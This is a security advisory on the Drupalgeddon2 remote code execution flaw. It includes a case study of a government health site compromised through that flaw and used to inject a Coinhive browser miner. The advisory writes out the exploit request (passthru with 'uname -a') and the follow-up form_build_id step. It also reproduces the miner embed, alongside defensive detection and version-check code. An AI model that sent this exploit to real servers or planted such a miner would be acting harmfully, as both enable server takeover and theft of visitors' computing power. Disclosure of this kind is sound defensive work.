CSP-CERT® Resources:
Security Advisory Series – Drupalgeddon 2 with Case in Point: Known Health Sector of the LGU Hosting Malware on its pages

by CSP-CERT® Red Team
posted June 2018



MANILA, Philippines - The National Privacy Commission (NPC) has ordered certain organizations with cybersecurity issues to cease operating their websites.


Four well-known food establishments have taken their delivery websites offline following orders from the NPC. Our current findings show 101 domains in the Philippines running the Drupal Content Management System (CMS): 26 university domains, 28 government domains and 47 private-sector domains, all of which are potentially exposed to unauthorized access and data leaks.


Overall, 50% of those 101 domains were found to be vulnerable to Drupalgeddon2 (CVE-2018-7600). This vulnerability allows an unauthenticated attacker to take over the whole system simply by accessing the URL and submitting the publicly available exploit code (see Figure 1 below for the statistics).


VULNERABILITY INFORMATION


CVE-2018-7600 | Drupal < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 - 'Drupalgeddon2' RCE (SA-CORE-2018-002)


Figure 1: Drupal Usage Detection in Philippine Region

Cybersecurity Philippines-CERT will notify the website owners so they can verify and fix the vulnerability as soon as possible.

We also found that some of these web applications had already been exploited through Drupalgeddon2: a malicious script was injected into the website to perform cryptocurrency mining in visitors' browsers.


During discovery, our security researchers used only non-intrusive testing techniques that do not affect the confidentiality, integrity or availability of the websites, their data or their infrastructure. Website owners were notified promptly and reliably so the vulnerability could be remediated, following CERT guidelines for responsible disclosure.


UPDATE AND REMEDIATION


Update your Drupal installation immediately. If you are running 7.x, upgrade to Drupal 7.58. If you are running 8.5.x, upgrade to 8.5.1; 8.4.x to 8.4.6; 8.3.x to 8.3.9; any older 8.x release to at least 8.3.9. Note that updating only closes the hole: it does not remove backdoors or injected scripts from a site that was already exploited. If there is any sign of compromise (unexpected files, modified templates, injected scripts such as the miner described in the case below), treat the server as compromised and restore from a backup taken before the attack, or rebuild it. It is also worth blocking public access to CHANGELOG.txt so the exact core version is not advertised to attackers.



Security Advisory Series – Case in Point: Known Health Sector of the LGU Hosting Malware on its pages


SECURITY ADVISORY


We received a report from a third-party source that a website in the health sector of a local government unit has been hosting malware on its pages. This could indicate that the server has been compromised.


To prevent further exploitation and abuse, this breach requires immediate attention and action by Cyber Security Philippines - CERT.


Please see the following report attached below for the incident information:


Accessing the website through its web portal immediately triggers a malware alert from Windows Defender, indicating that a file in the AppData folder contains malicious code. Examining the path shows that the file sits in the cache folder of the browser, Mozilla Firefox. This means a malicious script served by the website was executed in the browser when the site was visited.


Figure 1: Malicious Detection

To validate the Windows Defender detection, the site's source code was reviewed. The first five lines of the source clearly show an injected script that has been added to every page of the website.


Figure 2: Malicious Code Injected on the Source Code

The script comes from the browser-based mining service coinhive.com. It uses the CPU of every visitor who browses the site to mine cryptocurrency, which is credited to the site key supplied in the script, “PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf“.


Several anti-malware vendors flag the embedded script when its URL is submitted to the virustotal.com scan engine.


Figure 3: Virus Total Detection Result
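The injection described above is easy to confirm without a browser or an antivirus alert: pull the page and look for the Coinhive library tag and the site key passed to its miner constructor. The following Python script is an added example for this advisory, not code from the original page or from the affected site. The sample HTML is constructed to mirror the usual Coinhive embed (library tag plus an inline starter at the top of the page) using the site key reported above; the hostname list is a starting point to be extended from your own threat-intelligence feed.

```python
import re
from html.parser import HTMLParser

# Constructed sample page, not the LGU site's real HTML: it mirrors the usual
# Coinhive embed (library tag plus an inline starter) placed at the top of
# every page, using the site key reported in this advisory.
SAMPLE_HTML = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf', {throttle: 0.2});
miner.start();
</script>
<title>Provincial Health Office</title>
</head><body><p>Welcome</p></body></html>"""

# Hostnames Coinhive served its miner from (assumed starting list; extend it
# with whatever your threat-intel feed lists for other in-browser miners).
MINER_HOSTS = ("coinhive.com", "coin-hive.com")

# Matches the site key passed to the miner constructor,
# e.g. new CoinHive.Anonymous('KEY') or new CoinHive.User('KEY', 'user').
SITEKEY_RE = re.compile(r"CoinHive\.(?:Anonymous|User)\(\s*['\"]([A-Za-z0-9]+)['\"]")


class _ScriptCollector(HTMLParser):
    """Collect every <script src=...> URL and every inline <script> body."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> bodies over as raw data (CDATA mode).
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def find_miner(html):
    """Return the miner script URLs and site keys found in an HTML document.

    An empty result means no known Coinhive indicator was present; a non-empty
    'site_keys' list tells you which account the stolen CPU time was credited to.
    """
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    srcs = [s for s in parser.srcs if any(h in s.lower() for h in MINER_HOSTS)]
    keys = [k for body in parser.inline for k in SITEKEY_RE.findall(body)]
    return {"script_srcs": srcs, "site_keys": keys}


if __name__ == "__main__":
    print(find_miner(SAMPLE_HTML))
```

Run it over the HTML of every page on the site, not just the front page: the advisory notes the script was added to all pages, and a partial clean-up that leaves it on one template will keep re-triggering the antivirus alerts.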

Further investigation revealed the threat actor's likely entry point into the website's server.


The website runs on Drupal 7, as shown below:


Figure 4: Entry Point Vulnerable Drupal Version

The exact version, 7.38, is revealed by the publicly readable CHANGELOG.txt file that Drupal ships in its web root.


Figure 5: Change Log Information

As the change log shows, the site is running an outdated version of the CMS that lacks the SA-CORE-2018-002 patch for the then newly disclosed vulnerability CVE-2018-7600, a highly critical remote code execution bug affecting the following Drupal versions:


• Before 7.58
• 8.x before 8.3.9
• 8.4.x before 8.4.6
• 8.5.x before 8.5.1
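The fingerprinting step above (read the version from CHANGELOG.txt, compare it with the fixed releases) is mechanical enough to script, which is how the 101 domains in the first part of this advisory can be triaged quickly. The following Python is an added example, not code from the original advisory or from Drupal. The change log excerpt is constructed in the format Drupal 7 uses for that file, and the version thresholds are the ones listed in the advisory; fetching the real file is left to curl or your scanner, since this block runs offline.

```python
import re

# Constructed excerpt in the format of a Drupal 7 CHANGELOG.txt (the real file
# lists every release, newest first). The version matches the one found on the
# affected site; the rest of the text is filler for this example.
SAMPLE_CHANGELOG = """
Drupal 7.38, 2015-06-17
-----------------------
- (release notes omitted in this constructed sample)

Drupal 7.37, 2015-05-07
-----------------------
"""

# First fixed release on each branch per SA-CORE-2018-002 / CVE-2018-7600.
FIXED = {"7": (7, 58), "8.3": (8, 3, 9), "8.4": (8, 4, 6), "8.5": (8, 5, 1)}


def parse_changelog_version(text):
    """Return the newest release string from a Drupal 7 CHANGELOG.txt, or None.

    The file starts with a line such as 'Drupal 7.38, 2015-06-17', so the first
    match is the running version.
    """
    m = re.search(r"^Drupal (\d+(?:\.\d+)+),", text, re.M)
    return m.group(1) if m else None


def is_vulnerable(version):
    """True if the given core version predates its branch's Drupalgeddon2 fix."""
    parts = tuple(int(p) for p in version.split("."))
    if parts[0] == 7:
        return parts < FIXED["7"]
    if parts[0] == 8:
        branch = ".".join(str(p) for p in parts[:2])
        if branch in FIXED:
            return parts < FIXED[branch]
        # 8.0.x to 8.2.x received no fixed release; the advisory's own wording
        # ("8.x before 8.3.9") treats all of them as affected.
        return True
    return False  # branches this advisory does not cover (e.g. Drupal 6)


def assess_changelog(text):
    """Fingerprint the version from change log text, then judge it.

    Returns (version, vulnerable); (None, None) when no release line is found,
    which is not proof of safety: the file may simply have been removed.
    """
    version = parse_changelog_version(text)
    if version is None:
        return None, None
    return version, is_vulnerable(version)


if __name__ == "__main__":
    print(assess_changelog(SAMPLE_CHANGELOG))
```

A missing or blocked CHANGELOG.txt only means the fingerprint failed, not that the site is patched; confirm with the owner in that case rather than marking the domain clean.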


To prove the concept, the Firefox add-on HackBar was used to craft a POST request to the vulnerable Drupal Form API endpoints.


The exploit is sent to the URL hxxp://subdomain.website.gov.ph/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=uname+-a with the POST body “form_id=user_pass&_triggering_element_name=name”. It abuses Drupal's #post_render and #markup render-array properties, smuggled in through the name parameter, so that PHP's passthru() function executes the operating system command uname -a and returns the server's details.


Figure 6: Vulnerable Parameter

As the figure illustrates, the payload is executed by crafting a second POST request using the hidden form_build_id collected from the response to the first request.


Figure 7: Extract form_build_id for payload execution

The form_build_id is then sent to the URL hxxp://subdomain.website.gov.ph/?q=file/ajax/name/%23value/{form_build_id} with the POST parameter form_build_id={form_build_id}.

Figure 8: Payload Execution

As the figure shows, the server responded with the output of the OS command uname -a (the server's details) together with additional response data. This was most likely the entry point the attackers used to download and install backdoors on the server and then inject their mining script.
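The two-request flow above works because PHP turns bracketed parameter names into nested arrays, and Drupal 7's renderer treats any array key beginning with '#' as a render-array property, including the #post_render callback list. The following Python model is an added example, not code from the original advisory or from Drupal: it parses the advisory's exact query string the way PHP fills $_POST, shows the #post_render callback reaching a stand-in for passthru() with 'uname -a' as its argument, applies the '#'-key stripping that the SA-CORE-2018-002 patch introduced for Drupal 7, and extracts the form_build_id the second request must echo back. The response fragment and the passthru stand-in are constructed; nothing is executed and nothing is sent over the network.

```python
import re
from urllib.parse import parse_qsl

# The query string from the advisory's first request, exactly as sent.
PAYLOAD_QUERY = ("q=user/password&name[%23post_render][]=passthru"
                 "&name[%23type]=markup&name[%23markup]=uname+-a")

# Constructed fragment of what the first response contains: Drupal 7 emits the
# form build id as a hidden input, and the second request needs that value.
SAMPLE_RESPONSE_HTML = ('<input type="hidden" name="form_build_id" '
                        'value="form-constructedSampleId" />')


def php_parse_qs(query):
    """Decode a query string into nested dicts/lists the way PHP fills $_GET/$_POST,
    so name[#post_render][]=passthru becomes {'name': {'#post_render': ['passthru']}}."""
    result = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        m = re.match(r"^([^\[]+)((?:\[[^\]]*\])*)$", key)
        if not m:
            continue
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        _assign(result, path, value)
    return result


def _assign(container, path, value):
    head, rest = path[0], path[1:]
    if not rest:
        if head == "":
            container.append(value)       # a trailing [] appends, as in PHP
        else:
            container[head] = value
        return
    child_is_list = rest[0] == ""
    if head == "":
        child = [] if child_is_list else {}
        container.append(child)
    else:
        child = container.get(head)
        if child is None:
            child = [] if child_is_list else {}
            container[head] = child
    _assign(child, rest, value)


# Stand-in for PHP's passthru(): records the command instead of running it.
CALLBACKS = {"passthru": lambda cmd: "[passthru would execute: %s]" % cmd}


def render_element(element):
    """Model of the drupal_render() step the exploit abuses: #markup becomes the
    rendered children and each #post_render callback is then called on them.
    In Drupal 7 the callback is whatever string the array holds, so an
    attacker-supplied array ends up as call_user_func('passthru', 'uname -a')."""
    if not isinstance(element, dict):
        return element if isinstance(element, str) else ""
    children = element.get("#markup", "")
    for callback in element.get("#post_render", []):
        fn = CALLBACKS.get(callback)
        if fn is not None:
            children = fn(children)
    return children


def strip_dangerous_values(value):
    """Model of the SA-CORE-2018-002 fix: drop every input key that begins with
    '#' at any depth before the request reaches Form API, so render-array
    properties can never be injected through user input."""
    if isinstance(value, dict):
        return {k: strip_dangerous_values(v) for k, v in value.items()
                if not str(k).startswith("#")}
    if isinstance(value, list):
        return [strip_dangerous_values(v) for v in value]
    return value


def extract_form_build_id(html):
    """Pull the hidden form_build_id that the second request must echo back."""
    m = re.search(r'name="form_build_id"\s+value="([^"]+)"', html)
    return m.group(1) if m else None


def stage2_path(form_build_id):
    """Path of the second request, as given in the advisory."""
    return "?q=file/ajax/name/%23value/" + form_build_id


if __name__ == "__main__":
    submitted = php_parse_qs(PAYLOAD_QUERY)
    print("unpatched:", render_element(submitted["name"]))
    print("patched:  ", repr(render_element(strip_dangerous_values(submitted)["name"])))
    print("stage 2:  ", stage2_path(extract_form_build_id(SAMPLE_RESPONSE_HTML)))
```

The same '#'-key check makes a usable WAF or log rule while a site waits for the upgrade: any request whose parameter names contain a bracketed key starting with '#' (URL-encoded as %23) has no legitimate reason to exist in Drupal traffic.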